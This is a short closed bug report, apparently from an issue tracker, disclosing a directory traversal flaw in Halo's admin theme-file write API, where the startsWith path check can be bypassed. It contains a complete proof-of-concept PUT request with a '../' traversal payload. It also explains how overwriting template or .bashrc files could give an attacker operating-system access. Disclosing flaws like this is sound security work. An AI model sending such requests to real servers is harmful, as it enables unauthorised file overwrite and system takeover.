Closed
Description
I am sure I have checked
I want to apply
- BUG feedback
An interface to write files in the background, a directory traversal check is performed on the input path parameter, but the startsWith function can be used to bypass it.
PUT /api/admin/themes/caicai_anatole/files/content HTTP/1.1
Host: xxxx:8090
Content-Length: 105
Admin-Authorization: 19cfedbb4994443c8b3f7eebf9ef36b3
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://xxx:8090
Referer: http://xxxx:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"path":"/root/.halo/templates/themes/anatole/../../../../../../tmp/pwned","content":"xxxxx\nxxxttt\nbb"}
Therefore, the attacker can overwrite some files, such as ftl files, .bashrc files in the user directory, and finally get the permissions of the operating system
